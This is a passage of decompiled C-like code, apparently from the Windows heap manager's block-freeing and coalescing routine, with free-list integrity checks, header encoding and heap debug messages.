															_v32 = _t1883;
															_t1565 =  *(_t1518 + 0xc);
															_v88 = _t1565;
															_t1149 =  *_t1565;
															_t1566 =  *(_t1883 + 4);
															_v44 = _t1566;
															__eflags = _t1149 - _t1566;
															_t1567 = _v88;
															if(_t1149 != _t1566) {
																L536:
																_push(_t1567);
																_t1546 = 0xd;
																_t1074 = L0185A80D(_t1871, _t1738, _v44, _t1149);
																_v73 = 0;
																goto L153;
															}
															__eflags = _t1149 - _t1738;
															if(_t1149 != _t1738) {
																goto L536;
															}
															 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1518 & 0x0000ffff);
															_t1740 =  *(_t1871 + 0xb4);
															__eflags = _t1740;
															if(_t1740 == 0) {
																L258:
																 *_t1567 = _t1883;
																 *(_t1883 + 4) = _t1567;
																__eflags =  *(_t1518 + 2) & 0x00000008;
																if(( *(_t1518 + 2) & 0x00000008) != 0) {
																	_t1151 = E017BA229(_t1871, _t1518);
																	__eflags = _t1151;
																	if(_t1151 != 0) {
																		goto L259;
																	}
																	_t1546 = _t1871;
																	_t1074 = E017BA309(_t1871, _t1518,  *_t1518 & 0x0000ffff, 1);
																	_v73 = 0;
																	goto L153;
																}
																L259:
																_v73 = 1;
																L76:
																_t1569 =  *(_t1518 + 2);
																_v71 = _t1569;
																__eflags = _v104;
																if(_v104 == 0) {
																	__eflags = _t1569 & 0x00000004;
																	if((_t1569 & 0x00000004) != 0) {
																		_t1905 = ( *_t1518 & 0x0000ffff) * 8 - 0x10;
																		_v244 = _t1905;
																		__eflags = _t1569 & 0x00000002;
																		if((_t1569 & 0x00000002) != 0) {
																			__eflags = _t1905 - 4;
																			if(_t1905 > 4) {
																				_t1905 = _t1905 - 4;
																				__eflags = _t1905;
																				_v244 = _t1905;
																			}
																		}
																		_t872 = _t1518 + 0x10; // 0x10
																		_t1373 = E017ED540(_t872, _t1905, 0xfeeefeee);
																		_v32 = _t1373;
																		__eflags = _t1373 - _t1905;
																		if(_t1373 != _t1905) {
																			_t1651 =  *[fs:0x30];
																			__eflags =  *(_t1651 + 0xc);
																			if( *(_t1651 + 0xc) == 0) {
																				_push("HEAP: ");
																				E0179B150();
																				_t1941 = _t1937 + 4;
																			} else {
																				E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																				_t1941 = _t1937 + 8;
																			}
																			_t1569 = _v100;
																			_push(_v32 + 0x10 + _t1569);
																			E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1569);
																			_t1937 = _t1941 + 0xc;
																			_t1379 =  *[fs:0x30];
																			__eflags =  *((char*)(_t1379 + 2));
																			if( *((char*)(_t1379 + 2)) == 0) {
																				_t1518 = _v100;
																			} else {
																				 *0x1886378 = 1;
																				_t1518 = _v100;
																				 *0x18860c0 = _t1518;
																				asm("int3");
																				 *0x1886378 = 0;
																			}
																		}
																	}
																}
																_v120 = _t1518;
																__eflags =  *(_t1518 + 2) & 0x00000001;
																if(( *(_t1518 + 2) & 0x00000001) != 0) {
																	_push(_t1569);
																	_t1546 = 3;
																	_t1074 = L0185A80D(_t1871, _t1518, 0, 0);
																	goto L153;
																} else {
																	 *(_t1518 + 2) = _v64;
																	_t1571 = _v52;
																	_t1885 = ( *_t1518 & 0x0000ffff) - _t1571;
																	_v320 = _t1885;
																	 *_t1518 = _t1571;
																	_t1743 = _a4;
																	_t1153 = _a8 - _t1743;
																	_v44 = _t1153;
																	__eflags = _t1153 - 0x3f;
																	if(_t1153 >= 0x3f) {
																		 *(_t1518 + _t1571 * 8 - 4) = _t1153;
																		 *(_t1518 + 7) = 0x3f;
																	} else {
																		 *(_t1518 + 7) = _t1153;
																	}
																	 *(_t1518 + 3) = 0;
																	__eflags = _t1885;
																	if(_t1885 == 0) {
																		L137:
																		_t1886 = _v120;
																		_v80 =  &(_t1886[4]);
																		_t1518 = ( *_t1886 & 0x0000ffff) * 8;
																		_v196 = _t1518;
																		__eflags = (_t1886[3] & 0x0000003f) - 0x3f;
																		if((_t1886[3] & 0x0000003f) == 0x3f) {
																			_t1158 = 1;
																		} else {
																			_t1158 = 0;
																			__eflags = 0;
																		}
																		_t1546 = _t1518;
																		__eflags = _t1158;
																		if(_t1158 != 0) {
																			_t1007 = _t1518 - 4; // -4
																			_t1546 = _t1007;
																			_t1518 = _t1546;
																			_v196 = _t1518;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1744 = _v96;
																			__eflags = _t1744 & 0x00000008;
																			if((_t1744 & 0x00000008) == 0) {
																				__eflags =  *(_t1871 + 0x40) & 0x00000040;
																				if(( *(_t1871 + 0x40) & 0x00000040) == 0) {
																					L296:
																					_t1525 = _a4;
																					L297:
																					__eflags =  *(_t1871 + 0x40) & 0x00000020;
																					if(( *(_t1871 + 0x40) & 0x00000020) != 0) {
																						_t1159 = _v80;
																						 *((intOrPtr*)(_t1159 + _t1525)) = 0xabababab;
																						 *((intOrPtr*)(_t1159 + _t1525 + 4)) = 0xabababab;
																						 *(_v120 + 2) =  *(_v120 + 2) | 0x00000004;
																					}
																					_t1887 = _v120;
																					 *(_t1887 + 3) = 0;
																					__eflags =  *(_t1887 + 2) & 0x00000002;
																					if(( *(_t1887 + 2) & 0x00000002) == 0) {
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v348 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) == 0) {
																							goto L301;
																						}
																						_t1518 = _v120;
																						_t1546 = _t1871;
																						 *(_t1887 + 3) = L0183E9F0(_t1871, _t1744 >> 0x00000012 & 0x000000ff, 0,  *_t1518 & 0x0000ffff, 0);
																						goto L302;
																					} else {
																						_t1546 = _t1887;
																						_t1526 = E01791F5B(_t1887);
																						_v276 = _t1526;
																						 *_t1526 = 0;
																						 *((intOrPtr*)(_t1526 + 4)) = 0;
																						__eflags =  *(_t1871 + 0x40) & 0x08000000;
																						if(( *(_t1871 + 0x40) & 0x08000000) != 0) {
																							_t1546 = 1;
																							 *_t1526 = E017C16C7(1, _t1744);
																							_t1744 = _v96;
																						}
																						_t1074 =  *( *[fs:0x30] + 0x68);
																						_v344 = _t1074;
																						__eflags = _t1074 & 0x00000800;
																						if((_t1074 & 0x00000800) != 0) {
																							_t1518 = _v120;
																							_t1074 = L0183E9F0(_t1871, _t1744 >> 0x00000012 & 0x00000fff, 0,  *_t1518 & 0x0000ffff, 0);
																							_t1546 = _v276;
																							 *(_v276 + 2) = _t1074;
																							goto L302;
																						} else {
																							L301:
																							_t1518 = _v120;
																							L302:
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) != 0) {
																								 *(_t1887 + 3) =  *(_t1518 + 1) ^  *_t1518 ^  *(_t1887 + 2);
																								_t1074 =  *(_t1871 + 0x50);
																								 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																							}
																							goto L153;
																						}
																					}
																				}
																				_t1525 = _a4;
																				E017ED5E0(_v80, _t1525 & 0xfffffffc, 0xbaadf00d);
																				_t1744 = _v96;
																				goto L297;
																			}
																			_t618 = _t1546 - 8; // -8
																			E017DFA60(_v80, 0, _t618);
																			_t1744 = _v96;
																			goto L296;
																		} else {
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1889 = _v120;
																				_t1889[0] = _t1889[0] ^ _t1889[0] ^  *_t1889;
																				 *_t1889 =  *_t1889 ^  *(_t1871 + 0x50);
																				__eflags =  *_t1889;
																			}
																			__eflags = _v53;
																			if(_v53 == 0) {
																				L152:
																				_t1074 = _v96;
																				__eflags = _t1074 & 0x00000008;
																				if((_t1074 & 0x00000008) != 0) {
																					_t398 = _t1518 - 8; // -8
																					_t1074 = E017DFA60(_v80, 0, _t398);
																				}
																				goto L153;
																			} else {
																				__eflags =  *(_t1871 + 0x44) & 0x01000000;
																				if(( *(_t1871 + 0x44) & 0x01000000) != 0) {
																					L149:
																					_t1888 =  *(_t1871 + 0xc8);
																					_t360 = _t1888 + 8;
																					 *_t360 =  *(_t1888 + 8) + 0xffffffff;
																					__eflags =  *_t360;
																					if( *_t360 != 0) {
																						L151:
																						_v53 = 0;
																						goto L152;
																					}
																					 *(_t1888 + 0xc) = 0;
																					_t1546 = _t1546 | 0xffffffff;
																					asm("lock cmpxchg [edx], ecx");
																					_t1750 = 0xfffffffe;
																					_v104 = 0xfffffffe;
																					__eflags = 0xfffffffe - 0xfffffffe;
																					if(0xfffffffe != 0xfffffffe) {
																						__eflags =  *(_t1888 + 4) & 0x00000001;
																						if(__eflags != 0) {
																							_push(_t1888);
																							L0182FF10(_t1518, 0xfffffffe, _t1871, _t1888, __eflags);
																							_t1750 = _v104;
																						}
																						while(1) {
																							__eflags = _t1750 & 0x00000002;
																							if((_t1750 & 0x00000002) == 0) {
																								_t1179 = 1;
																							} else {
																								_t1179 = 3;
																							}
																							_v88 = _t1179;
																							_t1546 = _t1179 + _t1750;
																							_t1180 = _t1750;
																							asm("lock cmpxchg [edx], ecx");
																							__eflags = _t1180 - _v104;
																							if(_t1180 == _v104) {
																								break;
																							}
																							_t1750 = _t1180;
																							_v104 = _t1750;
																						}
																						__eflags = _v88 & 0x00000002;
																						if((_v88 & 0x00000002) != 0) {
																							E01794DC0(_t1546, _t1888);
																						}
																					}
																					goto L151;
																				}
																				 *(_t1871 + 0x21c) =  *(_t1871 + 0x21c) + 1;
																				_t1546 =  *(_t1871 + 0x224);
																				__eflags =  *(_t1871 + 0x21c) - _t1546;
																				if( *(_t1871 + 0x21c) > _t1546) {
																					 *(_t1871 + 0x21c) = 0;
																					_t1753 =  *((intOrPtr*)(_t1871 + 0x1e8)) - ( *(_t1871 + 0x74) << 3);
																					__eflags = _t1753 -  *((intOrPtr*)(_t1871 + 0x238));
																					if(_t1753 >  *((intOrPtr*)(_t1871 + 0x238))) {
																						 *((intOrPtr*)(_t1871 + 0x238)) = _t1753;
																					}
																					 *((intOrPtr*)(_t1871 + 0x23c)) = _t1753;
																				}
																				 *(_t1871 + 0x228) =  *(_t1871 + 0x228) + 1;
																				__eflags =  *(_t1871 + 0x228) - 0x1000;
																				if( *(_t1871 + 0x228) >= 0x1000) {
																					__eflags =  *((char*)(_t1871 + 0xda)) - 2;
																					if( *((char*)(_t1871 + 0xda)) != 2) {
																						L364:
																						_t1182 = 0x10;
																						L360:
																						__eflags =  *(_t1871 + 0x220) - _t1182;
																						if( *(_t1871 + 0x220) > _t1182) {
																							__eflags = _t1546 - 0x10000;
																							if(_t1546 < 0x10000) {
																								 *(_t1871 + 0x224) = _t1546 + _t1546;
																							}
																						}
																						 *(_t1871 + 0x220) = 0;
																						 *(_t1871 + 0x228) = 0;
																						goto L149;
																					}
																					__eflags =  *((intOrPtr*)(_t1871 + 0x22c)) - 0x10;
																					if( *((intOrPtr*)(_t1871 + 0x22c)) <= 0x10) {
																						goto L364;
																					}
																					_t1182 = 0x100;
																					goto L360;
																				} else {
																					goto L149;
																				}
																			}
																		}
																	} else {
																		__eflags = _t1885 - 1;
																		if(_t1885 == 1) {
																			 *_t1518 =  *_t1518 + 1;
																			_t1192 = _a8 - _t1743 + 8;
																			_v68 = _t1192;
																			__eflags = _t1192 - 0x3f;
																			if(_t1192 >= 0x3f) {
																				 *(_t1518 + 4 + _t1571 * 8) = _t1192;
																				 *(_t1518 + 7) = 0x3f;
																			} else {
																				 *(_t1518 + 7) = _t1192;
																			}
																			goto L137;
																		}
																		__eflags = _v104;
																		if(_v104 == 0) {
																			_t1754 = 1;
																		} else {
																			_t1754 = 0;
																			__eflags = 0;
																		}
																		_v116 = _t1754;
																		_t1193 =  *((intOrPtr*)(_t1518 + 6));
																		__eflags = _t1193;
																		if(_t1193 != 0) {
																			_t1576 = (1 - (_t1193 & 0x000000ff) << 0x10) + (_t1518 & 0xffff0000);
																			_v48 = 1;
																		} else {
																			_t1576 = _t1871;
																			_v48 = _t1871;
																		}
																		_v248 = _t1576;
																		_v32 = _t1885;
																		_t1518 = _t1518 + _v52 * 8;
																		_v88 = 0;
																		 *(_t1518 + 2) = _v71;
																		 *(_t1518 + 7) = 0;
																		 *(_t1518 + 4) =  *(_t1871 + 0x54) ^ _v52;
																		__eflags =  *((intOrPtr*)(_t1576 + 0x18)) - _v48;
																		if( *((intOrPtr*)(_t1576 + 0x18)) != _v48) {
																			_t1205 = (_t1518 - _v48 >> 0x10) + 1;
																			_v32 = _t1205;
																			_v108 = _t1205;
																			__eflags = _t1205 - 0xfe;
																			if(_t1205 >= 0xfe) {
																				_push(_t1576);
																				L0185A80D( *((intOrPtr*)(_t1576 + 0x18)), _t1518, _t1576, 0);
																				_t1754 = _v116;
																				_t1205 = _v32;
																			}
																		} else {
																			_t1205 = 0;
																			__eflags = 0;
																		}
																		_v110 = _t1205;
																		 *((char*)(_t1518 + 6)) = _t1205;
																		 *(_t1518 + 3) = 0;
																		 *_t1518 = _t1885;
																		while(1) {
																			_t1577 = _t1518 + _t1885 * 8;
																			_t1209 =  *(_t1871 + 0x4c) >> 0x00000014 &  *(_t1871 + 0x52) ^ _t1577[1];
																			__eflags = _t1209 & 0x00000001;
																			if((_t1209 & 0x00000001) != 0) {
																				break;
																			}
																			__eflags =  *(_t1871 + 0x4c);
																			if( *(_t1871 + 0x4c) != 0) {
																				_t1760 =  *(_t1871 + 0x50) ^  *_t1577;
																				 *_t1577 = _t1760;
																				_t1599 = _t1760 >> 0x00000010 ^ _t1760 >> 0x00000008 ^ _t1760;
																				__eflags = _t1760 >> 0x18 - _t1599;
																				if(__eflags != 0) {
																					_push(_t1599);
																					L0184FA2B(_t1518, _t1871, _t1518 + _t1885 * 8, _t1871, _t1885, __eflags);
																				}
																				_t1577 = _t1518 + _t1885 * 8;
																			}
																			_t762 =  &(_t1577[4]); // 0x17b47f1
																			_t1755 = _t762;
																			_v32 = _t1755;
																			_v48 =  *_t1755;
																			_t765 =  &(_t1577[6]); // 0x18a164ff
																			_t1211 =  *_t765;
																			_v44 = _t1211;
																			_t1212 =  *_t1211;
																			_t768 = _v48 + 4; // 0x1475ffec
																			__eflags = _t1212 -  *_t768;
																			_t769 =  &(_t1577[4]); // 0x17b47f1
																			_t1757 = _t769;
																			if(_t1212 !=  *_t768) {
																				L523:
																				_push(_t1577);
																				_t998 = _v48 + 4; // 0x1475ffec
																				_t1546 = 0xd;
																				L0185A80D(_t1871, _t1757,  *_t998, _t1212);
																				goto L524;
																			} else {
																				__eflags = _t1212 - _t1757;
																				if(_t1212 != _t1757) {
																					goto L523;
																				}
																				 *(_t1871 + 0x74) =  *(_t1871 + 0x74) - ( *_t1577 & 0x0000ffff);
																				_t1802 =  *(_t1871 + 0xb4);
																				__eflags = _t1802;
																				if(_t1802 == 0) {
																					L381:
																					_t1217 = _v48;
																					_t1803 = _v44;
																					 *_t1803 = _t1217;
																					 *((intOrPtr*)(_t1217 + 4)) = _t1803;
																					__eflags = _t1577[1] & 0x00000008;
																					if((_t1577[1] & 0x00000008) != 0) {
																						_t1218 = E017BA229(_t1871, _t1577);
																						__eflags = _t1218;
																						if(_t1218 != 0) {
																							goto L382;
																						}
																						_t1546 = _t1871;
																						E017BA309(_t1871, _t1518 + _t1885 * 8,  *(_t1518 + _t1885 * 8) & 0x0000ffff, 1);
																						L524:
																						_v72 = 0;
																						__eflags = _v88;
																						if(_v88 != 0) {
																							_v112 = 0;
																							 *( *[fs:0x18] + 0xbf4) = 0xc000003c;
																							_t1890 =  *[fs:0x18];
																							_v340 = _t1890;
																							 *((intOrPtr*)(_t1890 + 0x34)) = E0179CCC0(0xc000003c);
																							goto L153;
																						}
																						_v88 = 1;
																						_t1754 = _v116;
																						continue;
																					}
																					L382:
																					_v72 = 1;
																					_t1579 = _v116;
																					_t1805 = _t1518 + _t1885 * 8;
																					__eflags = _t1579;
																					if(_t1579 != 0) {
																						_t1219 = _t1805[1];
																						_v111 = _t1219;
																						__eflags = _t1219 & 0x00000004;
																						if((_t1219 & 0x00000004) != 0) {
																							_t1589 = _t1518 + _t1885 * 8;
																							_t1253 = ( *(_t1518 + _t1885 * 8) & 0x0000ffff) * 8 - 0x10;
																							_v192 = _t1253;
																							__eflags = _v111 & 0x00000002;
																							if((_v111 & 0x00000002) != 0) {
																								__eflags = _t1253 - 4;
																								if(_t1253 > 4) {
																									_t1253 = _t1253 - 4;
																									__eflags = _t1253;
																									_v192 = _t1253;
																								}
																							}
																							_t1255 = E017ED540( &(_t1589[8]), _t1253, 0xfeeefeee);
																							_v32 = _t1255;
																							__eflags = _t1255 - _v192;
																							if(_t1255 == _v192) {
																								_t1805 = _t1518 + _t1885 * 8;
																							} else {
																								_t1590 =  *[fs:0x30];
																								__eflags =  *(_t1590 + 0xc);
																								if( *(_t1590 + 0xc) == 0) {
																									_push("HEAP: ");
																									E0179B150();
																									_t1940 = _t1937 + 4;
																								} else {
																									E0179B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																									_t1940 = _t1937 + 8;
																								}
																								_push(_v32 + 0x10 + _t1518 + _t1885 * 8);
																								E0179B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1518 + _t1885 * 8);
																								_t1937 = _t1940 + 0xc;
																								_t1261 =  *[fs:0x30];
																								_t1805 = _t1518 + _t1885 * 8;
																								__eflags =  *((char*)(_t1261 + 2));
																								if( *((char*)(_t1261 + 2)) != 0) {
																									 *0x1886378 = 1;
																									 *0x18860c0 = _t1805;
																									asm("int3");
																									 *0x1886378 = 0;
																								}
																							}
																							_t1579 = _v116;
																						}
																					}
																					 *(_t1518 + 2) = _t1805[1];
																					_t1807 = ( *_t1805 & 0x0000ffff) + _t1885;
																					_v32 = _t1807;
																					_t1221 = _t1807 & 0x0000ffff;
																					_v32 = _t1807 & 0x0000ffff;
																					__eflags = _t1807 - 0xfe00;
																					if(_t1807 > 0xfe00) {
																						E017BA830(_t1871, _t1518, _t1807);
																						goto L136;
																					} else {
																						 *_t1518 = _t1807;
																						_t1892 = _t1221;
																						 *(_t1518 + 4 + _t1807 * 8) =  *(_t1871 + 0x54) ^ _v32;
																						__eflags = _t1579;
																						if(_t1579 != 0) {
																							 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																							 *(_t1518 + 7) = 0;
																							__eflags =  *(_t1871 + 0x40) & 0x00000040;
																							if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																								_t969 = _t1518 + 0x10; // 0x10
																								E017ED5E0(_t969, _t1892 * 8 - 0x10, 0xfeeefeee);
																								_t970 = _t1518 + 2;
																								 *_t970 =  *(_t1518 + 2) | 0x00000004;
																								__eflags =  *_t970;
																							}
																							_t1227 = _t1871 + 0xc0;
																							__eflags =  *(_t1871 + 0xb4);
																							if( *(_t1871 + 0xb4) == 0) {
																								_t1581 =  *_t1227;
																							} else {
																								_t1581 = E017BE12C(_t1871, _t1892);
																								_t1227 = _t1871 + 0xc0;
																							}
																							while(1) {
																								__eflags = _t1227 - _t1581;
																								if(_t1227 == _t1581) {
																									break;
																								}
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) == 0) {
																									_t1811 =  *(_t1581 - 8);
																								} else {
																									_t1811 =  *(_t1581 - 8);
																									_v132 = _t1811;
																									__eflags =  *(_t1871 + 0x4c) & _t1811;
																									if(( *(_t1871 + 0x4c) & _t1811) != 0) {
																										_t1811 = _t1811 ^  *(_t1871 + 0x50);
																										_v132 = _t1811;
																									}
																								}
																								_v136 = _t1811;
																								__eflags = _t1892 - (_t1811 & 0x0000ffff);
																								if(_t1892 <= (_t1811 & 0x0000ffff)) {
																									break;
																								} else {
																									_t1581 =  *_t1581;
																									_t1227 = _t1871 + 0xc0;
																									continue;
																								}
																							}
																							_t986 = _t1518 + 8; // 0x8
																							_t1893 = _t986;
																							_t1228 =  *((intOrPtr*)(_t1581 + 4));
																							_t1809 =  *_t1228;
																							__eflags = _t1809 - _t1581;
																							if(_t1809 != _t1581) {
																								_push(_t1581);
																								__eflags = 0;
																								L0185A80D(0, _t1581, 0, _t1809);
																							} else {
																								 *_t1893 = _t1581;
																								 *((intOrPtr*)(_t1893 + 4)) = _t1228;
																								 *_t1228 = _t1893;
																								 *((intOrPtr*)(_t1581 + 4)) = _t1893;
																							}
																							 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																							_t1765 =  *(_t1871 + 0xb4);
																							__eflags = _t1765;
																							if(_t1765 == 0) {
																								L134:
																								__eflags =  *(_t1871 + 0x4c);
																								if( *(_t1871 + 0x4c) != 0) {
																									 *(_t1518 + 3) =  *(_t1518 + 2) ^  *(_t1518 + 1) ^  *_t1518;
																									 *_t1518 =  *_t1518 ^  *(_t1871 + 0x50);
																									__eflags =  *_t1518;
																								}
																								L136:
																								_v112 = 1;
																								_v71 = 0;
																								goto L137;
																							} else {
																								_t1583 =  *_t1518 & 0x0000ffff;
																								while(1) {
																									__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																									if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																										break;
																									}
																									_t1235 =  *_t1765;
																									__eflags = _t1235;
																									if(_t1235 != 0) {
																										_t1765 = _t1235;
																										continue;
																									}
																									_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																									__eflags = _t1236;
																									L520:
																									_v272 = _t1236;
																									L329:
																									E017BE4A0(_t1871, _t1765, 1, _t1893, _t1236, _t1583);
																									goto L134;
																								}
																								_t1236 = _t1583;
																								goto L520;
																							}
																						}
																						 *(_t1518 + 2) = _t1579;
																						 *(_t1518 + 7) = _t1579;
																						_t1244 = _t1871 + 0xc0;
																						__eflags =  *(_t1871 + 0xb4);
																						if( *(_t1871 + 0xb4) == 0) {
																							_t1586 =  *_t1244;
																						} else {
																							_t1586 = E017BE12C(_t1871, _t1892);
																							_t1244 = _t1871 + 0xc0;
																						}
																						while(1) {
																							__eflags = _t1244 - _t1586;
																							if(_t1244 == _t1586) {
																								break;
																							}
																							__eflags =  *(_t1871 + 0x4c);
																							if( *(_t1871 + 0x4c) == 0) {
																								_t1813 =  *(_t1586 - 8);
																							} else {
																								_t1813 =  *(_t1586 - 8);
																								_v92 = _t1813;
																								__eflags =  *(_t1871 + 0x4c) & _t1813;
																								if(( *(_t1871 + 0x4c) & _t1813) != 0) {
																									_t1813 = _t1813 ^  *(_t1871 + 0x50);
																									_v92 = _t1813;
																								}
																							}
																							_v138 = _t1813;
																							__eflags = _t1892 - (_t1813 & 0x0000ffff);
																							if(_t1892 <= (_t1813 & 0x0000ffff)) {
																								break;
																							} else {
																								_t1586 =  *_t1586;
																								_t1244 = _t1871 + 0xc0;
																								continue;
																							}
																						}
																						_t803 = _t1518 + 8; // 0x8
																						_t1893 = _t803;
																						_t1246 =  *((intOrPtr*)(_t1586 + 4));
																						_t1814 =  *_t1246;
																						__eflags = _t1814 - _t1586;
																						if(_t1814 != _t1586) {
																							_push(_t1586);
																							L0185A80D(0, _t1586, 0, _t1814);
																						} else {
																							 *_t1893 = _t1586;
																							 *((intOrPtr*)(_t1893 + 4)) = _t1246;
																							 *_t1246 = _t1893;
																							 *((intOrPtr*)(_t1586 + 4)) = _t1893;
																						}
																						 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																						_t1765 =  *(_t1871 + 0xb4);
																						__eflags = _t1765;
																						if(_t1765 == 0) {
																							goto L134;
																						} else {
																							_t1583 =  *_t1518 & 0x0000ffff;
																							while(1) {
																								__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																								if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																									break;
																								}
																								_t1249 =  *_t1765;
																								__eflags = _t1249;
																								if(_t1249 != 0) {
																									_t1765 = _t1249;
																									continue;
																								}
																								_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																								__eflags = _t1236;
																								L395:
																								_v268 = _t1236;
																								goto L329;
																							}
																							_t1236 = _t1583;
																							goto L395;
																						}
																					}
																				}
																				_t1594 =  *_t1577 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1594 -  *((intOrPtr*)(_t1802 + 4));
																					if(_t1594 <  *((intOrPtr*)(_t1802 + 4))) {
																						break;
																					}
																					_t1269 =  *_t1802;
																					__eflags = _t1269;
																					if(_t1269 != 0) {
																						_t1802 = _t1269;
																						continue;
																					}
																					_t1267 =  *((intOrPtr*)(_t1802 + 4)) - 1;
																					__eflags = _t1267;
																					L380:
																					_v264 = _t1267;
																					E017BBC04(_t1871, _t1802, 1, _v32, _t1267, _t1594);
																					_t1577 = _t1518 + _t1885 * 8;
																					goto L381;
																				}
																				_t1267 = _t1594;
																				goto L380;
																			}
																		}
																		_t1894 = _t1885 & 0x0000ffff;
																		_v48 = _t1894;
																		_t1577[2] =  *(_t1871 + 0x54) ^ _t1894;
																		__eflags = _t1754;
																		if(_t1754 != 0) {
																			 *(_t1518 + 2) =  *(_t1518 + 2) & 0x000000f0;
																			 *(_t1518 + 7) = 0;
																			__eflags =  *(_t1871 + 0x40) & 0x00000040;
																			if(( *(_t1871 + 0x40) & 0x00000040) != 0) {
																				_t911 = _t1518 + 0x10; // 0x10
																				E017ED5E0(_t911, _t1894 * 8 - 0x10, 0xfeeefeee);
																				 *(_t1518 + 2) =  *(_t1518 + 2) | 0x00000004;
																			}
																			_t1281 = _t1871 + 0xc0;
																			__eflags =  *(_t1871 + 0xb4);
																			if( *(_t1871 + 0xb4) == 0) {
																				_t1601 =  *_t1281;
																			} else {
																				_t1601 = E017BE12C(_t1871, _t1894);
																				_t1281 = _t1871 + 0xc0;
																			}
																			while(1) {
																				__eflags = _t1281 - _t1601;
																				if(_t1281 == _t1601) {
																					break;
																				}
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) == 0) {
																					_t1766 =  *(_t1601 - 8);
																				} else {
																					_t1766 =  *(_t1601 - 8);
																					_v156 = _t1766;
																					__eflags =  *(_t1871 + 0x4c) & _t1766;
																					if(( *(_t1871 + 0x4c) & _t1766) != 0) {
																						_t1766 = _t1766 ^  *(_t1871 + 0x50);
																						__eflags = _t1766;
																						_v156 = _t1766;
																					}
																				}
																				_v134 = _t1766;
																				__eflags = _t1894 - (_t1766 & 0x0000ffff);
																				if(_t1894 > (_t1766 & 0x0000ffff)) {
																					_t1601 =  *_t1601;
																					_t1281 = _t1871 + 0xc0;
																					continue;
																				} else {
																					break;
																				}
																			}
																			_t674 = _t1518 + 8; // 0x8
																			_t1893 = _t674;
																			_t1282 =  *((intOrPtr*)(_t1601 + 4));
																			_t1763 =  *_t1282;
																			__eflags = _t1763 - _t1601;
																			if(_t1763 != _t1601) {
																				_push(_t1601);
																				L0185A80D(0, _t1601, 0, _t1763);
																			} else {
																				 *_t1893 = _t1601;
																				 *((intOrPtr*)(_t1893 + 4)) = _t1282;
																				 *_t1282 = _t1893;
																				 *((intOrPtr*)(_t1601 + 4)) = _t1893;
																			}
																			 *(_t1871 + 0x74) =  *(_t1871 + 0x74) + ( *_t1518 & 0x0000ffff);
																			_t1765 =  *(_t1871 + 0xb4);
																			__eflags = _t1765;
																			if(_t1765 == 0) {
																				goto L134;
																			} else {
																				_t1583 =  *_t1518 & 0x0000ffff;
																				while(1) {
																					__eflags = _t1583 -  *((intOrPtr*)(_t1765 + 4));
																					if(_t1583 <  *((intOrPtr*)(_t1765 + 4))) {
																						break;
																					}
																					_t1285 =  *_t1765;
																					__eflags = _t1285;
																					if(_t1285 == 0) {
																						_t1236 =  *((intOrPtr*)(_t1765 + 4)) - 1;
																						L328:
																						_v260 = _t1236;
																						goto L329;
																					}
																					_t1765 = _t1285;
																				}
																				_t1236 = _t1583;
																				goto L328;
																			}
																		}
																		 *(_t1518 + 2) = _t1754;
																		 *(_t1518 + 7) = _t1754;
																		_t1289 = _t1871 + 0xc0;
																		_t1604 =  *(_t1871 + 0xb4);
																		_v36 = _t1604;
																		__eflags = _t1604;
																		if(_t1604 == 0) {
																			_t1895 =  *_t1289;
																			goto L119;
																		} else {
																			while(1) {
																				_t1315 =  *((intOrPtr*)(_t1604 + 4));
																				__eflags = _t1894 - _t1315;
																				if(_t1894 < _t1315) {
																					_v172 = _t1894;
																					_t1316 = _t1894;
																					break;
																				}
																				_t1784 =  *_t1604;
																				__eflags = _t1784;
																				if(_t1784 == 0) {
																					_t1316 = _t1315 - 1;
																					__eflags = _t1316;
																					L201:
																					_v172 = _t1316;
																					break;
																				} else {
																					_t1604 = _t1784;
																					_v36 = _t1604;
																					continue;
																				}
																			}
																			_v64 = _t1316;
																			_v52 = _t1316 -  *(_t1604 + 0x14);
																			_t1785 =  *(_t1604 + 0x18);
																			_v40 = _t1785;
																			_t1318 =  *((intOrPtr*)(_t1785 + 4));
																			__eflags = _t1785 - _t1318;
																			if(_t1785 == _t1318) {
																				_t1895 = _t1785;
																			} else {
																				_t1319 = _t1318 + 0xfffffff8;
																				_v32 = _t1319;
																				_t1320 =  *_t1319;
																				_v412 = _t1320;
																				_t1617 = _t1320 & 0x0000ffff;
																				__eflags =  *(_t1871 + 0x4c);
																				if( *(_t1871 + 0x4c) != 0) {
																					_t1799 =  *(_t1871 + 0x50) ^ _t1320;
																					_v412 = _t1799;
																					_t1364 = _t1799 & 0x0000ffff;
																					_v44 = _t1364;
																					_v68 = _t1364 & 0x0000ffff;
																					_t1648 = _t1799 >> 0x00000010 ^ _t1799 >> 0x00000008 ^ _t1799;
																					__eflags = _t1799 >> 0x18 - _t1648;
																					if(_t1799 >> 0x18 != _t1648) {
																						_push(_t1648);
																						L0185A80D(_t1871, _v32, 0, 0);
																						_t1617 = _v44 & 0x0000ffff;
